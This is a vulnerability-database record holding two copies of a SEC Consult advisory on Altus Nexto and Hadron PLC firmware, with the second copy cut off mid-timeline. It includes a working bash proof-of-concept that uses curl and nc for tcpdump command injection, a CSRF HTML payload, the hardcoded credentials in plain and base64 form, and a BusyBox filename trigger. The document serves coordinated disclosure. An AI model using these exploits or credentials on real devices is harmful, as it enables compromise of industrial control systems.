{"packetstorm": [{"lastseen": "2021-08-19T17:23:50", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-19T00:00:00", "type": "packetstorm", "title": "Altus Sistemas de Automacao Products CSRF / Command Injection / Hardcoded Credentials", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16544", "CVE-2021-39243", "CVE-2021-39244", "CVE-2021-39245"], "modified": "2021-08-19T00:00:00", "id": "PACKETSTORM:163889", "href": "https://packetstormsecurity.com/files/163889/Altus-Sistemas-de-Automacao-Products-CSRF-Command-Injection-Hardcoded-Credentials.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20210819-0 > \n======================================================================= \ntitle: Multiple Critical Vulnerabilities \nproduct: Multiple Altus Sistemas de Automacao products: \nNexto NX30xx Series \nNexto NX5xxx Series \nNexto Xpress XP3xx Series \nHadron Xtorm HX3040 Series \nvulnerable version: See \"Vulnerable / tested versions\" \nfixed version: See \"Solution\" \nCVE number: CVE-2021-39243, CVE-2021-39243, CVE-2021-39243 \nimpact: Critical \nhomepage: https://www.altus.com.br/ \nfound: 2020-05-20 \nby: D. Teuchert \nT. Weber (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult, an Atos company \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"As a reference for the automation market for more than 35 years, Altus \nSistemas de Automa\u00e7\u00e3o S.A. offers a complete line of products that meet a wide \nrange of customers\u2019 needs in several areas of the domestic and international \nmarkets. Developed with own technology, our solutions deliver high added value \nto our customers businesses, enabling productivity, safety and reliability for \nindustrial automation applications and industrial automation processes. \n \nWe are a member of Parit Participa\u00e7\u00f5es, a holding company in the technology \nsector, which also controls Teikon S.A., a company with operations on the \nelectronic manufacturing market, and RT Tecnologia M\u00e9dica, a company that \noperates in the radiological market.\" \n \nSource: https://www.altus.com.br/sobre \n \nBusiness recommendation: \n------------------------ \nThe vendor provides a patch which should be installed immediately. \n \nSEC Consult recommends to perform a thorough security review of these \nproducts conducted by security professionals to identify and resolve all \nsecurity issues. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Authenticated Semi-Blind Command Injection via Parameter Injection (CVE-2021-39244) \nThe getlogs.cgi script allows authenticated users to start tcpdump on the \ndevice. By injecting payloads into specific parameters it is also possible to \nexecute arbitrary OS commands. The output of these commands can be obtained in \nanother step. \n \n2) Cross-Site Request Forgery (CSRF) (CVE-2021-39243) \nThe web interface that is used to set all configurations is vulnerable to \ncross-site request forgery attacks. An attacker can change settings this way by \nluring the victim to a malicious website. \n \n3) Hardcoded Credentials for CGI Endpoint (CVE-2021-39245) \nThe getlogs.cgi script is exclusively htaccess-protected with hardcoded \ncredentials. These are shared with all firmware images from the series NX30xx, \nHX30xx and XP3xx. These hardcoded credentials can be used to access the device \nwithout a valid user account on application level and cannot be changed in the \nuser interface. \n \nIn combination with vulnerability 1), a full compromization on system level \nwith the only precondition of network access can be done. \n \n4) Outdated and Vulnerable Software Components \nA static scan with the IoT Inspector revealed outdated software packages that \nare used in the devices' firmware. \n \nThe used BusyBox toolkit is outdated and contains multiple known \nvulnerabilities. The outdated version was found by IoT Inspector. One of the \ndiscovered vulnerabilities (CVE-2017-16544) was verified by using the MEDUSA \nscalable firmware runtime. \n \n \nProof of concept: \n----------------- \n1) Authenticated Semi-Blind Command Injection via Parameter Injection (CVE-2021-39244) \nThe following firmware extract of getlogs.cgi displays the vulnerability: \n------------------------------------------------------------------------------- \nTCPDUMP_IFACE=`echo \"$QUERY_STRING\" | sed -n 's/^.*tcpdump_iface=\\([^&]*\\).*$/\\1/p' | sed \"s/%20/ /g\"` \nTCPDUMP_COUNT=`echo \"$QUERY_STRING\" | sed -n 's/^.*tcpdump_count=\\([^&]*\\).*$/\\1/p' | sed \"s/%20/ /g\"` \n[...] \necho \"tcpdump is running ...\" \necho \"<p>Please, wait the capture of $TCPDUMP_COUNT packets in $TCPDUMP_IFACE.</p>\" \nchrt -p -f 70 $$ \ntcpdump -i $TCPDUMP_IFACE -c $TCPDUMP_COUNT -w /tmp/capture.pcap \nmount / -o rw,remount \nln -s /tmp/capture.pcap /usr/www/capture.pcap \nmount / -o ro,remount \necho \"<a href=\\\"capture.pcap\\\" download=\\\"$TCPDUMP_IFACE-capture.pcap\\\">Click here to download the capture file</a>\" \n------------------------------------------------------------------------------- \nAs it can be seen, the variables $TCPDUMP_COUNT and $TCPDUMP_IFACE are used \nunfiltered in the tcpdump command. This means, that it is possible to inject \narbitrary parameters to the tcpdump command. The flag -z for tcpdump allows to \ndefine a program that will run on the capture file. This behaviour can be used \nto execute arbitrary commands. The following request injects parameters, so \nthat tcpdump listens on UDP port 1234 and will execute the capture file with \nsh: \n------------------------------------------------------------------------------- \nGET /getlogs.cgi?logtype=tcpdump&tcpdump_iface=eth0&tcpdump_count=1%20-G%201%20-z%20sh%20-U%20-A%20udp%20port%201234 HTTP/1.1 \nHost: $IP \nAuthorization: Basic YWx0dXM6bmV4dG8xMjM0 \n \n------------------------------------------------------------------------------- \nThe next step to exploit this vulnerability is to send the commands to UDP port \n1234: \n \n$ echo -e \";\\n$CMD &>/tmp/capture.pcap;\\n'\\n$CMD &>/tmp/capture.pcap;\" | nc -u $TARGET_HOST $UDP_PORT \n \nThe command is sent twice because it is possible, that the capture file \ncontains a \"'\" before the sent payload. Injecting the commands twice with a \"'\" \nin between makes sure, that the command will be executed by sh and not \ninterpreted as a string. The output of the executed command is redirected to \nthe file capture.pcap which can be accessed via the following request: \n------------------------------------------------------------------------------- \nGET /capture.pcap HTTP/1.1 \nHost: $IP \n------------------------------------------------------------------------------- \nThese three steps are combined in the following proof of concept script: \n------------------------------------------------------------------------------- \n#!/bin/bash \n#Author: D. Teuchert \nCMD=\"whoami\" \nif [[ $# -eq 1 ]]; then \nCMD=$1 \nfi \nTARGET_HOST=\"192.168.100.123\" \nUDP_PORT=1234 \nBASIC_AUTH_USERNAME=\"altus\" \nBASIC_AUTH_PASSWORD=\"nexto1234\" \nBASIC_AUTH_HEADER=$(printf \"$BASIC_AUTH_USERNAME:$BASIC_AUTH_PASSWORD\" | base64) \n \n#Sending HTTP request with parameter injection in tcpdump \n#Break out of tcpdump is done via a technique described here: \n#https://insinuator.net/2019/07/how-to-break-out-of-restricted-shells-with-tcpdump/ \ncurl -s -k -X \"GET\" -H \"Host: $TARGET_HOST\" -H \"Authorization: Basic $BASIC_AUTH_HEADER\" \"http://$TARGET_HOST/getlogs.cgi?logtype=tcpdump&tcpdump_iface=eth0&tcpdump_count=1%20-G%201%20-z%20sh%20-U%20-A%20udp%20port%20$UDP_PORT\">/dev/null & \n#Send udp packet with payload \necho -e \";\\n$CMD &>/tmp/capture.pcap;\\n'\\n$CMD &>/tmp/capture.pcap;\" | nc -u $TARGET_HOST $UDP_PORT \necho -e \"Executed \\\"$CMD\\\".\\nResponse:\" \n#The output of the executed command was saved in capture.pcap \ncurl -s -k -X \"GET\" -H \"Host: $TARGET_HOST\" \"http://$TARGET_HOST/capture.pcap\" \n------------------------------------------------------------------------------- \n \n2) Cross-Site Request Forgery (CSRF) (CVE-2021-39243) \nThe following CSRF proof-of-concept can be used to do the first step of the \ncommand Injection exploitation: \n------------------------------------------------------------------------------- \n<html> \n<body> \n<script>history.pushState('', '', '/')</script> \n<form action=\"http://$IP/getlogs.cgi\"> \n<input type=\"hidden\" name=\"logtype\" value=\"tcpdump\" /> \n<input type=\"hidden\" name=\"tcpdump_iface\" value=\"eth0\" /> \n<input type=\"hidden\" name=\"tcpdump_count\" value=\"1 -G 1 -z sh -U -A udp port 1234\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n------------------------------------------------------------------------------- \n \n3) Hardcoded Credentials for CGI Endpoint (CVE-2021-39245) \nThe hardcoded credentials are present under \"/etc/lighttpd/lighttpd-auth.conf\": \naltus:nexto1234 \n \nThese credentials are exclusively used for the getlogs.cgi script. This is also \ndescribed in the lighttpd.conf which is located under the same directory: \n------------------------------------------------------------------------------- \n[...] \nauth.debug = 0 \nauth.backend = \"plain\" \nauth.backend.plain.userfile = \"/etc/lighttpd/lighttpd-auth.conf\" \n \nauth.require = ( \"/cgi/getlogs.cgi\" => \n( \n\"method\" => \"basic\", \n\"realm\" => \"Password protected area\", \n\"require\" => \"user=altus\" \n) \n) \n[...] \n------------------------------------------------------------------------------- \n \n4) Outdated and Vulnerable Software Components \nBased on an automated scan with the IoT Inspector the following third party \nsoftware packages were found to be outdated: \n \nAltus/Beijer XP3xx: \nBusyBox 1.19.4 \nGNU glibc 2.19 \nlighttpd 1.4.30 \nLinux Kernel 4.9.98 \nOpenSSH 5.9p1 \nOpenSSL 1.0.0g \nOpenSSL 1.1.1b (in CODESYS) \nCODESYS Control 3.5.15 \n \nAltus/Beijer NX30xx: \nBusyBox 1.1.3 \nDropbear SSH 0.45 \nGNU glibc 2.5 \nlighttpd 1.4.24-devel-v1.0.0.7-1727-g6fd3998 \nLinux Kernel 2.6.23 \nOpenSSL 0.9.8g \nOpenSSL 1.1.1b (in CODESYS) \nCODESYS Control 3.5.15 \n \nAltus/Beijer HX30xx: \nBusyBox 1.19.4 \nGNU glibc 2.11.1 \nlighttpd 1.4.30 \nLinux Kernel 3.0.75 \nOpenSSH 5.9p1 \nOpenSSL 1.0.0g \nOpenSSL 1.0.2j (in CODESYS) \nCODESYS Control 3.5.12.65 \n \nThe BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on \nan emulated device: \n \nA file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created to trigger the \nvulnerability. \n------------------------------------------------------------------------------- \n# ls \"pressing <TAB>\" \ntest \n55\\;test.txt \n# \n------------------------------------------------------------------------------- \n \nThe vulnerabilities 1), 2), 3), 4) were manually verified on an emulated device \nby using the MEDUSA scalable firmware runtime. \n \nVulnerable / tested versions: \n----------------------------- \nThe following firmware versions have been found to be vulnerable: \nAltus/Beijer Nexto NX3003 / 1.8.11.0 \nAltus/Beijer Nexto NX3004 / 1.8.11.0 \nAltus/Beijer Nexto NX3005 / 1.8.11.0 \nAltus/Beijer Nexto NX3010 / 1.8.3.0 \nAltus/Beijer Nexto NX3020 / 1.8.3.0 \nAltus/Beijer Nexto NX3030 / 1.8.3.0 \nAltus/Beijer Nexto Xpress XP300 / 1.8.11.0 \nAltus/Beijer Nexto Xpress XP315 / 1.8.11.0 \nAltus/Beijer Nexto Xpress XP325 / 1.8.11.0 \nAltus/Beijer Nexto Xpress XP340 / 1.8.11.0 \nAltus/Beijer Hadron Xtorm HX3040 / 1.7.58.0 \n \nThe following versions are also vulnerable according to the vendor: \nAltus/Beijer Nexto NX5100 / 1.8.11.0 \nAltus/Beijer Nexto NX5101 / 1.8.11.0 \nAltus/Beijer Nexto NX5110 / 1.1.2.8 \nAltus/Beijer Nexto NX5210 / 1.1.2.8 \n \nVendor contact timeline: \n------------------------ \n2020-05-25: Contacting VDE CERT through info@cert.vde.com. Received \nconfirmation from VDE CERT. \n2020-05-01 - 2020-09-01: Multiple emails and telephone calls with VDE CERT. \nVDE CERT contacts said, that the vendor did not respond on any \nmessages or calls. \n2020-09-30: Wrote a message to the SVP R&D and Supply Chain of Beijer \nElectronics. No answer. \n2020-10-05: Call with the helpdesk of Beijer Electronics AB. The contact stated \nthat no case regarding vulnerabilities were opened and created one. \nThe product owners of Westermo, Korenix and Beijer Electronics were \ninformed via this inquiry. Set disclosure date to 2020-11-25. \n2020-10-06: Restarted the whole responsible disclosure process by sending a \nrequest to the new security contact cs@beijerelectronics.com. \n2020-11-11: Asked the representatives of Korenix and Beijer regarding the \nstatus. No answer. \n2020-11-25: Phone call with security manager of Beijer. Sent advisories via \nencrypted archive to cs@beijerelectronics.com. Received \nconfirmation of advisory receipt. Security manager told us that he \ncan provide information regarding the time-line for the patches \nwithin the next two weeks. \n2020-12-09: Asked for an update. \n2020-12-18: Call with security manager of Beijer. Vendor presented initial \nanalysis done by the affected companies, also Altus. Preliminary \nplans to fix the vulnerabilities were presented. Altus stated to \nfix issue #1 in January and the other vulnerabilities in March or \nApril. \n2021-03-21: Security manager invited SEC Consult to have a status meeting. \n2021-03-25: Altus fixed vulnerability #1. Handover of the advisory handling to \nAltus employees will be done in April. Vendor released fixed \nfirmware regarding issue #1. \n2021-04-09: Meeting with Altus. Vendor did not agree with another potentially \nvulnerability, which was identified on the emulated device. Thus, \nit was removed from the advisory. Vulnerabilities #2 and #3 were \nplanned to be fixed earlier this year but the releases shifted due \nto Covid. The new firmware version will be released in July 2021. \n2021-04-22: Asked for an update; No answer. \n2021-05-04: Asked for an update. \n2021-05-07: Vendor was working on the security fixes. \n2021-05-11: Vendor sent timeline for fixes and detailed version information. \nTwo additional models were added to the affected devices by the \nvendor. \n2021-06-10: Added additional information and asked if more time will be needed. \n2021-06-10: Vendor added affected version numbers and asked for the 1st of \nAugust as new release date. \n2021-06-15: Set the release date to 1st of August. \n2021-07-28: Vendor sent the version numbers for the fixed firmware and asked \nfor postponing the release to 6th of August for completing the \ndocumentation. \n2021-08-16: Due to holiday, the SEC Consult Vulnerability was closed. Informed \nvendor to release the advisory in the next four days. \n2021-08-17: Received CVE IDs. \n2021-08-18: Informed vendor to release the advisory on 2021-08-19. \n2021-08-19: Coordinated release of security advisory. \n \nSolution: \n--------- \nAccording to the vendor the following patches must be applied to fix issue 1), \n2) and 3): \n \nXP300 - v1.11.2.0 \nXP315 - v1.11.2.0 \nXP325 - v1.11.2.0 \nXP340 - v1.11.2.0 \nBCS-NX3003 - v1.11.2.0 \nBCS-NX3004 - v1.11.2.0 \nBCS-NX3005 - v1.11.2.0 \nBCS-NX3010 - v1.9.1.0 \nBCS-NX3020 - v1.9.1.0 \nBCS-NX3030 - v1.9.1.0 \nBCS-NX5100 - v1.11.2.0 \nBCS-NX5101 - v1.11.2.0 \nBCS-NX5110 - v1.11.2.0 \nBCS-NX5210 - v1.11.2.0 \nBCS-HX3040 - v1.11.2.0 \n \nVendor's statement regarding issue 4): \n\"Altus continuously integrates new features and fixes in the products, \nreleasing new firmware versions. Often those improvements require the software \npackages upgrading for several reasons, including security. When this happens, \nwe perform a set of tests to ensure that the performance, reliability, and \nsecurity were not negatively impacted by the upgrades. Although there are known \nvulnerabilities in some software package versions, those vulnerabilities can \nonly be exploited if we compile those specific features and provide the means \nto exploit them. The issue pointed out by SEC Consult, for instance, requires a \nterminal to be exploited, which we don't provide in real hardware. Nowadays, \nthere isn't any known exploitable vulnerability caused by outdated software \npackages in our products. Therefore, this item isn\u2019t considered a vulnerability \nby us.\" \n \n \nWorkaround: \n----------- \nRestrict network access to the device. \n \n \nAdvisory URL: \n------------- \nhttps://sec-consult.com/vulnerability-lab/ \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult, an Atos company \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an \nAtos company. It ensures the continued knowledge gain of SEC Consult in the \nfield of network and application security to stay ahead of the attacker. The \nSEC Consult Vulnerability Lab supports high-quality penetration testing and \nthe evaluation of new offensive and defensive technologies for our customers. \nHence our customers obtain the most current information about vulnerabilities \nand valid recommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://sec-consult.com/career/ \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://sec-consult.com/contact/ \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF Daniel Teuchert, Thomas Weber / @2021 \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163889/SA-20210819-0.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-20T17:33:51", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-19T00:00:00", "type": "zdt", "title": "Altus Sistemas de Automacao Products CSRF / Command Injection / Hardcoded Credentials Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39243", "CVE-2021-39245", "CVE-2017-16544", "CVE-2021-39244"], "modified": "2021-08-19T00:00:00", "id": "1337DAY-ID-36662", "href": "https://0day.today/exploit/description/36662", "sourceData": "=======================================================================\n title: Multiple Critical Vulnerabilities\n product: Multiple Altus Sistemas de Automacao products:\n Nexto NX30xx Series\n Nexto NX5xxx Series\n Nexto Xpress XP3xx Series\n Hadron Xtorm HX3040 Series\n vulnerable version: See \"Vulnerable / tested versions\"\n fixed version: See \"Solution\"\n CVE number: CVE-2021-39243, CVE-2021-39243, CVE-2021-39243\n impact: Critical\n homepage: https://www.altus.com.br/\n by: D. Teuchert\n T. Weber (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Atos company\n Europe | Asia | North America\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"As a reference for the automation market for more than 35 years, Altus\nSistemas de Automa\u00e7\u00e3o S.A. offers a complete line of products that meet a wide\nrange of customers\u2019 needs in several areas of the domestic and international\nmarkets. Developed with own technology, our solutions deliver high added value\nto our customers businesses, enabling productivity, safety and reliability for\nindustrial automation applications and industrial automation processes.\n\nWe are a member of Parit Participa\u00e7\u00f5es, a holding company in the technology\nsector, which also controls Teikon S.A., a company with operations on the\nelectronic manufacturing market, and RT Tecnologia M\u00e9dica, a company that\noperates in the radiological market.\"\n\nSource: https://www.altus.com.br/sobre\n\nBusiness recommendation:\n------------------------\nThe vendor provides a patch which should be installed immediately.\n\nSEC Consult recommends to perform a thorough security review of these\nproducts conducted by security professionals to identify and resolve all\nsecurity issues.\n\n\nVulnerability overview/description:\n-----------------------------------\n1) Authenticated Semi-Blind Command Injection via Parameter Injection (CVE-2021-39244)\nThe getlogs.cgi script allows authenticated users to start tcpdump on the\ndevice. By injecting payloads into specific parameters it is also possible to\nexecute arbitrary OS commands. The output of these commands can be obtained in\nanother step.\n\n2) Cross-Site Request Forgery (CSRF) (CVE-2021-39243)\nThe web interface that is used to set all configurations is vulnerable to\ncross-site request forgery attacks. An attacker can change settings this way by\nluring the victim to a malicious website.\n\n3) Hardcoded Credentials for CGI Endpoint (CVE-2021-39245)\nThe getlogs.cgi script is exclusively htaccess-protected with hardcoded\ncredentials. These are shared with all firmware images from the series NX30xx,\nHX30xx and XP3xx. These hardcoded credentials can be used to access the device\nwithout a valid user account on application level and cannot be changed in the\nuser interface.\n\nIn combination with vulnerability 1), a full compromization on system level\nwith the only precondition of network access can be done.\n\n4) Outdated and Vulnerable Software Components\nA static scan with the IoT Inspector revealed outdated software packages that\nare used in the devices' firmware.\n\nThe used BusyBox toolkit is outdated and contains multiple known\nvulnerabilities. The outdated version was found by IoT Inspector. One of the\ndiscovered vulnerabilities (CVE-2017-16544) was verified by using the MEDUSA\nscalable firmware runtime.\n\n\nProof of concept:\n-----------------\n1) Authenticated Semi-Blind Command Injection via Parameter Injection (CVE-2021-39244)\nThe following firmware extract of getlogs.cgi displays the vulnerability:\n-------------------------------------------------------------------------------\nTCPDUMP_IFACE=`echo \"$QUERY_STRING\" | sed -n 's/^.*tcpdump_iface=\\([^&]*\\).*$/\\1/p' | sed \"s/%20/ /g\"`\nTCPDUMP_COUNT=`echo \"$QUERY_STRING\" | sed -n 's/^.*tcpdump_count=\\([^&]*\\).*$/\\1/p' | sed \"s/%20/ /g\"`\n[...]\necho \"tcpdump is running ...\"\necho \"<p>Please, wait the capture of $TCPDUMP_COUNT packets in $TCPDUMP_IFACE.</p>\"\nchrt -p -f 70 $$\ntcpdump -i $TCPDUMP_IFACE -c $TCPDUMP_COUNT -w /tmp/capture.pcap\nmount / -o rw,remount\nln -s /tmp/capture.pcap /usr/www/capture.pcap\nmount / -o ro,remount\necho \"<a href=\\\"capture.pcap\\\" download=\\\"$TCPDUMP_IFACE-capture.pcap\\\">Click here to download the capture file</a>\"\n-------------------------------------------------------------------------------\nAs it can be seen, the variables $TCPDUMP_COUNT and $TCPDUMP_IFACE are used\nunfiltered in the tcpdump command. This means, that it is possible to inject\narbitrary parameters to the tcpdump command. The flag -z for tcpdump allows to\ndefine a program that will run on the capture file. This behaviour can be used\nto execute arbitrary commands. The following request injects parameters, so\nthat tcpdump listens on UDP port 1234 and will execute the capture file with\nsh:\n-------------------------------------------------------------------------------\nGET /getlogs.cgi?logtype=tcpdump&tcpdump_iface=eth0&tcpdump_count=1%20-G%201%20-z%20sh%20-U%20-A%20udp%20port%201234 HTTP/1.1\nHost: $IP\nAuthorization: Basic YWx0dXM6bmV4dG8xMjM0\n\n-------------------------------------------------------------------------------\nThe next step to exploit this vulnerability is to send the commands to UDP port\n1234:\n\n$ echo -e \";\\n$CMD &>/tmp/capture.pcap;\\n'\\n$CMD &>/tmp/capture.pcap;\" | nc -u $TARGET_HOST $UDP_PORT\n\nThe command is sent twice because it is possible, that the capture file\ncontains a \"'\" before the sent payload. Injecting the commands twice with a \"'\"\nin between makes sure, that the command will be executed by sh and not\ninterpreted as a string. The output of the executed command is redirected to\nthe file capture.pcap which can be accessed via the following request:\n-------------------------------------------------------------------------------\nGET /capture.pcap HTTP/1.1\nHost: $IP\n-------------------------------------------------------------------------------\nThese three steps are combined in the following proof of concept script:\n-------------------------------------------------------------------------------\n#!/bin/bash\n#Author: D. Teuchert\nCMD=\"whoami\"\nif [[ $# -eq 1 ]]; then\n CMD=$1\nfi\nTARGET_HOST=\"192.168.100.123\"\nUDP_PORT=1234\nBASIC_AUTH_USERNAME=\"altus\"\nBASIC_AUTH_PASSWORD=\"nexto1234\"\nBASIC_AUTH_HEADER=$(printf \"$BASIC_AUTH_USERNAME:$BASIC_AUTH_PASSWORD\" | base64)\n\n#Sending HTTP request with parameter injection in tcpdump\n#Break out of tcpdump is done via a technique described here:\n#https://insinuator.net/2019/07/how-to-break-out-of-restricted-shells-with-tcpdump/\ncurl -s -k -X \"GET\" -H \"Host: $TARGET_HOST\" -H \"Authorization: Basic $BASIC_AUTH_HEADER\" \"http://$TARGET_HOST/getlogs.cgi?logtype=tcpdump&tcpdump_iface=eth0&tcpdump_count=1%20-G%201%20-z%20sh%20-U%20-A%20udp%20port%20$UDP_PORT\">/dev/null &\n#Send udp packet with payload\necho -e \";\\n$CMD &>/tmp/capture.pcap;\\n'\\n$CMD &>/tmp/capture.pcap;\" | nc -u $TARGET_HOST $UDP_PORT\necho -e \"Executed \\\"$CMD\\\".\\nResponse:\"\n#The output of the executed command was saved in capture.pcap\ncurl -s -k -X \"GET\" -H \"Host: $TARGET_HOST\" \"http://$TARGET_HOST/capture.pcap\"\n-------------------------------------------------------------------------------\n\n2) Cross-Site Request Forgery (CSRF) (CVE-2021-39243)\nThe following CSRF proof-of-concept can be used to do the first step of the\ncommand Injection exploitation:\n-------------------------------------------------------------------------------\n<html>\n <body>\n <script>history.pushState('', '', '/')</script>\n <form action=\"http://$IP/getlogs.cgi\">\n <input type=\"hidden\" name=\"logtype\" value=\"tcpdump\" />\n <input type=\"hidden\" name=\"tcpdump_iface\" value=\"eth0\" />\n <input type=\"hidden\" name=\"tcpdump_count\" value=\"1 -G 1 -z sh -U -A udp port 1234\" />\n <input type=\"submit\" value=\"Submit request\" />\n </form>\n </body>\n</html>\n-------------------------------------------------------------------------------\n\n3) Hardcoded Credentials for CGI Endpoint (CVE-2021-39245)\nThe hardcoded credentials are present under \"/etc/lighttpd/lighttpd-auth.conf\":\naltus:nexto1234\n\nThese credentials are exclusively used for the getlogs.cgi script. This is also\ndescribed in the lighttpd.conf which is located under the same directory:\n-------------------------------------------------------------------------------\n[...]\nauth.debug = 0\nauth.backend = \"plain\"\nauth.backend.plain.userfile = \"/etc/lighttpd/lighttpd-auth.conf\"\n\nauth.require = ( \"/cgi/getlogs.cgi\" =>\n (\n \"method\" => \"basic\",\n \"realm\" => \"Password protected area\",\n \"require\" => \"user=altus\"\n )\n)\n[...]\n-------------------------------------------------------------------------------\n\n4) Outdated and Vulnerable Software Components\nBased on an automated scan with the IoT Inspector the following third party\nsoftware packages were found to be outdated:\n\nAltus/Beijer XP3xx:\nBusyBox 1.19.4\nGNU glibc 2.19\nlighttpd 1.4.30\nLinux Kernel 4.9.98\nOpenSSH 5.9p1\nOpenSSL 1.0.0g\nOpenSSL 1.1.1b (in CODESYS)\nCODESYS Control 3.5.15\n\nAltus/Beijer NX30xx:\nBusyBox 1.1.3\nDropbear SSH 0.45\nGNU glibc 2.5\nlighttpd 1.4.24-devel-v1.0.0.7-1727-g6fd3998\nLinux Kernel 2.6.23\nOpenSSL 0.9.8g\nOpenSSL 1.1.1b (in CODESYS)\nCODESYS Control 3.5.15\n\nAltus/Beijer HX30xx:\nBusyBox 1.19.4\nGNU glibc 2.11.1\nlighttpd 1.4.30\nLinux Kernel 3.0.75\nOpenSSH 5.9p1\nOpenSSL 1.0.0g\nOpenSSL 1.0.2j (in CODESYS)\nCODESYS Control 3.5.12.65\n\nThe BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on\nan emulated device:\n\nA file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created to trigger the\nvulnerability.\n-------------------------------------------------------------------------------\n# ls \"pressing <TAB>\"\ntest\n55\\;test.txt\n#\n-------------------------------------------------------------------------------\n\nThe vulnerabilities 1), 2), 3), 4) were manually verified on an emulated device\nby using the MEDUSA scalable firmware runtime.\n\nVulnerable / tested versions:\n-----------------------------\nThe following firmware versions have been found to be vulnerable:\nAltus/Beijer Nexto NX3003 / 1.8.11.0\nAltus/Beijer Nexto NX3004 / 1.8.11.0\nAltus/Beijer Nexto NX3005 / 1.8.11.0\nAltus/Beijer Nexto NX3010 / 1.8.3.0\nAltus/Beijer Nexto NX3020 / 1.8.3.0\nAltus/Beijer Nexto NX3030 / 1.8.3.0\nAltus/Beijer Nexto Xpress XP300 / 1.8.11.0\nAltus/Beijer Nexto Xpress XP315 / 1.8.11.0\nAltus/Beijer Nexto Xpress XP325 / 1.8.11.0\nAltus/Beijer Nexto Xpress XP340 / 1.8.11.0\nAltus/Beijer Hadron Xtorm HX3040 / 1.7.58.0\n\nThe following versions are also vulnerable according to the vendor:\nAltus/Beijer Nexto NX5100 / 1.8.11.0\nAltus/Beijer Nexto NX5101 / 1.8.11.0\nAltus/Beijer Nexto NX5110 / 1.1.2.8\nAltus/Beijer Nexto NX5210 / 1.1.2.8\n\nVendor contact timeline:\n------------------------\n2020-05-25: Contacting VDE CERT through [email\u00a0protected] Received\n confirmation from VDE CERT.\n2020-05-01 - 2020-09-01: Multiple emails and telephone calls with VDE CERT.\n VDE CERT contacts said, that the vendor did not respond on any\n messages or calls.\n2020-09-30: Wrote a message to the SVP R&D and Supply Chain of Beijer\n Electronics. No answer.\n2020-10-05: Call with the helpdesk of Beijer Electronics AB. The contact stated\n that no case regarding vulnerabilities were opened and created one.\n The product owners of Westermo, Korenix and Beijer Electronics were\n informed via this inquiry. Set disclosure date to 2020-11-25.\n2020-10-06: Restarted the whole responsible disclosure process by sending a\n request to the new security contact [email\u00a0protected]\n2020-11-11: Asked the representatives of Korenix and Beijer regarding the\n status. No answer.\n2020-11-25: Phone call with security manager of Beijer. Sent advisories via\n encrypted archive to [email\u00a0protected] Received\n confirmation of advisory receipt. Security manager told us that he\n can provide information regarding the time-line for the patches\n within the next two weeks.\n2020-12-09: Asked for an update.\n2020-12-18: Call with security manager of 